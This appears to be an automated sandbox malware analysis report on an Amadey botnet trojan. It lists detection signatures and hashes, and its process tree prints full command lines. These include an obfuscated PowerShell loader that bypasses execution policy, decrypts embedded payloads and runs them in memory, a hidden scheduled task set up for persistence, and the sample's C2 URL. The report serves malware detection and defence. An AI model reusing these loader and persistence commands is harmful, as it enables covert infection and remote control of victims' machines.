Edit tour
Windows
Analysis Report
jcgLYlM4dg.exe
Overview
General Information
Sample name: | jcgLYlM4dg.exerenamed because original name is a hash value |
Original sample name: | 926fc8b724cc682d97cf0849c0fcbda3.exe |
Analysis ID: | 1428440 |
MD5: | 926fc8b724cc682d97cf0849c0fcbda3 |
SHA1: | 2f1555afddb43a13be489200a751698302340056 |
SHA256: | bcd9d9e586c6d788717507307e47d2e7c85eeaa49e7766434dbeca97973f8e59 |
Tags: | 32Amadeyexetrojan |
Infos: | |
Detection
Amadey
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected Powershell decode and execute
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- jcgLYlM4dg.exe (PID: 4324 cmdline:
"C:\Users\ user\Deskt op\jcgLYlM 4dg.exe" MD5: 926FC8B724CC682D97CF0849C0FCBDA3) - cmd.exe (PID: 1496 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\RarS FX0\Amadey .bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6640 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -ep bypas s -command function decrypt_fu nction($pa ram_var){ $aes_var=[ System.Sec urity.Cryp tography.A es]::Creat e(); $aes_ var.Mode=[ System.Sec urity.Cryp tography.C ipherMode] ::CBC; $ae s_var.Padd ing=[Syste m.Security .Cryptogra phy.Paddin gMode]::PK CS7; $aes_ var.Key=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('vgTu uGykaNIh9Y HZdnC5Etwd m0+AKH40IG DiJn6heLQ= '); $aes_v ar.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('gQ/PRz SPw/sfJ7E+ XuUWrA==') ; $decrypt or_var=$ae s_var.Crea teDecrypto r(); $retu rn_var=$de cryptor_va r.Transfor mFinalBloc k($param_v ar, 0, $pa ram_var.Le ngth); $de cryptor_va r.Dispose( ); $aes_va r.Dispose( ); $return _var;}func tion decom press_func tion($para m_var){ $v deGA=New-O bject Syst em.IO.Memo ryStream(, $param_var ); $adrDx= New-Object System.IO .MemoryStr eam; $Hvzl b=New-Obje ct System. IO.Compres sion.GZipS tream($vde GA, [IO.Co mpression. Compressio nMode]::De compress); $Hvzlb.Co pyTo($adrD x); $Hvzlb .Dispose() ; $vdeGA.D ispose(); $adrDx.Dis pose(); $a drDx.ToArr ay();}func tion execu te_functio n($param_v ar,$param2 _var){ $HM qcz=[Syste m.Reflecti on.Assembl y]::('daoL '[-1..-4] -join '')( [byte[]]$p aram_var); $ysWQp=$H Mqcz.Entry Point; $ys WQp.Invoke ($null, $p aram2_var) ;}$host.UI .RawUI.Win dowTitle = 'C:\Users \user\AppD ata\Local\ Temp\RarSF X0\Amadey. bat';$Hexf g=[System. IO.File]:: ('txeTllAd aeR'[-1..- 11] -join '')('C:\Us ers\user\A ppData\Loc al\Temp\Ra rSFX0\Amad ey.bat').S plit([Envi ronment]:: NewLine);f oreach ($X qpWb in $H exfg) { if ($XqpWb.S tartsWith( ':: ')) { $QgDIl=$Xq pWb.Substr ing(3); br eak; }}$pa yloads_var =[string[] ]$QgDIl.Sp lit('\');$ payload1_v ar=decompr ess_functi on (decryp t_function ([Convert ]::('gnirt S46esaBmor F'[-1..-16 ] -join '' )($payload s_var[0])) );$payload 2_var=deco mpress_fun ction (dec rypt_funct ion ([Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')($payl oads_var[1 ])));execu te_functio n $payload 1_var $nul l;execute_ function $ payload2_v ar (,[stri ng[]] ('') ); MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 2124 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Register-S cheduledTa sk -TaskNa me 'Runtim eBroker_st artup_958_ str' -Trig ger (New-S cheduledTa skTrigger -AtLogon) -Action (N ew-Schedul edTaskActi on -Execut e 'C:\User s\user\App Data\Roami ng\startup _str_958.v bs') -Sett ings (New- ScheduledT askSetting sSet -Allo wStartIfOn Batteries -Hidden -E xecutionTi meLimit 0) -RunLevel Highest - Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 4124 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 5044 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\start up_str_958 .vbs" MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 2624 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\startup _str_958.b at" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3808 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2636 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -ep bypas s -command function decrypt_fu nction($pa ram_var){ $aes_var=[ System.Sec urity.Cryp tography.A es]::Creat e(); $aes_ var.Mode=[ System.Sec urity.Cryp tography.C ipherMode] ::CBC; $ae s_var.Padd ing=[Syste m.Security .Cryptogra phy.Paddin gMode]::PK CS7; $aes_ var.Key=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('vgTu uGykaNIh9Y HZdnC5Etwd m0+AKH40IG DiJn6heLQ= '); $aes_v ar.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('gQ/PRz SPw/sfJ7E+ XuUWrA==') ; $decrypt or_var=$ae s_var.Crea teDecrypto r(); $retu rn_var=$de cryptor_va r.Transfor mFinalBloc k($param_v ar, 0, $pa ram_var.Le ngth); $de cryptor_va r.Dispose( ); $aes_va r.Dispose( ); $return _var;}func tion decom press_func tion($para m_var){ $v deGA=New-O bject Syst em.IO.Memo ryStream(, $param_var ); $adrDx= New-Object System.IO .MemoryStr eam; $Hvzl b=New-Obje ct System. IO.Compres sion.GZipS tream($vde GA, [IO.Co mpression. Compressio nMode]::De compress); $Hvzlb.Co pyTo($adrD x); $Hvzlb .Dispose() ; $vdeGA.D ispose(); $adrDx.Dis pose(); $a drDx.ToArr ay();}func tion execu te_functio n($param_v ar,$param2 _var){ $HM qcz=[Syste m.Reflecti on.Assembl y]::('daoL '[-1..-4] -join '')( [byte[]]$p aram_var); $ysWQp=$H Mqcz.Entry Point; $ys WQp.Invoke ($null, $p aram2_var) ;}$host.UI .RawUI.Win dowTitle = 'C:\Users \user\AppD ata\Roamin g\startup_ str_958.ba t';$Hexfg= [System.IO .File]::(' txeTllAdae R'[-1..-11 ] -join '' )('C:\User s\user\App Data\Roami ng\startup _str_958.b at').Split ([Environm ent]::NewL ine);forea ch ($XqpWb in $Hexfg ) { if ($X qpWb.Start sWith(':: ')) { $QgD Il=$XqpWb. Substring( 3); break; }}$payloa ds_var=[st ring[]]$Qg DIl.Split( '\');$payl oad1_var=d ecompress_ function ( decrypt_fu nction ([C onvert]::( 'gnirtS46e saBmorF'[- 1..-16] -j oin '')($p ayloads_va r[0])));$p ayload2_va r=decompre ss_functio n (decrypt _function ([Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ($payloads _var[1]))) ;execute_f unction $p ayload1_va r $null;ex ecute_func tion $payl oad2_var ( ,[string[] ] ('')); MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- wscript.exe (PID: 1480 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\App Data\Roami ng\startup _str_958.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 2716 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\startup _str_958.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1684 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 576 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -ep bypas s -command function decrypt_fu nction($pa ram_var){ $aes_var=[ System.Sec urity.Cryp tography.A es]::Creat e(); $aes_ var.Mode=[ System.Sec urity.Cryp tography.C ipherMode] ::CBC; $ae s_var.Padd ing=[Syste m.Security .Cryptogra phy.Paddin gMode]::PK CS7; $aes_ var.Key=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('vgTu uGykaNIh9Y HZdnC5Etwd m0+AKH40IG DiJn6heLQ= '); $aes_v ar.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('gQ/PRz SPw/sfJ7E+ XuUWrA==') ; $decrypt or_var=$ae s_var.Crea teDecrypto r(); $retu rn_var=$de cryptor_va r.Transfor mFinalBloc k($param_v ar, 0, $pa ram_var.Le ngth); $de cryptor_va r.Dispose( ); $aes_va r.Dispose( ); $return _var;}func tion decom press_func tion($para m_var){ $v deGA=New-O bject Syst em.IO.Memo ryStream(, $param_var ); $adrDx= New-Object System.IO .MemoryStr eam; $Hvzl b=New-Obje ct System. IO.Compres sion.GZipS tream($vde GA, [IO.Co mpression. Compressio nMode]::De compress); $Hvzlb.Co pyTo($adrD x); $Hvzlb .Dispose() ; $vdeGA.D ispose(); $adrDx.Dis pose(); $a drDx.ToArr ay();}func tion execu te_functio n($param_v ar,$param2 _var){ $HM qcz=[Syste m.Reflecti on.Assembl y]::('daoL '[-1..-4] -join '')( [byte[]]$p aram_var); $ysWQp=$H Mqcz.Entry Point; $ys WQp.Invoke ($null, $p aram2_var) ;}$host.UI .RawUI.Win dowTitle = 'C:\Users \user\AppD ata\Roamin g\startup_ str_958.ba t';$Hexfg= [System.IO .File]::(' txeTllAdae R'[-1..-11 ] -join '' )('C:\User s\user\App Data\Roami ng\startup _str_958.b at').Split ([Environm ent]::NewL ine);forea ch ($XqpWb in $Hexfg ) { if ($X qpWb.Start sWith(':: ')) { $QgD Il=$XqpWb. Substring( 3); break; }}$payloa ds_var=[st ring[]]$Qg DIl.Split( '\');$payl oad1_var=d ecompress_ function ( decrypt_fu nction ([C onvert]::( 'gnirtS46e saBmorF'[- 1..-16] -j oin '')($p ayloads_va r[0])));$p ayload2_va r=decompre ss_functio n (decrypt _function ([Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ($payloads _var[1]))) ;execute_f unction $p ayload1_va r $null;ex ecute_func tion $payl oad2_var ( ,[string[] ] ('')); MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution |
{"C2 url": "ruspyc.top/j4Fvskd3/index.php", "Version": "4.18"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Amadey_2 | Yara detected Amadey\'s stealer DLL | Joe Security | ||
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
JoeSecurity_Amadey_2 | Yara detected Amadey\'s stealer DLL | Joe Security | ||
JoeSecurity_Amadey_2 | Yara detected Amadey\'s stealer DLL | Joe Security | ||
Click to see the 3 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Amadey_2 | Yara detected Amadey\'s stealer DLL | Joe Security | ||
JoeSecurity_Amadey_2 | Yara detected Amadey\'s stealer DLL | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Thomas Patzke: |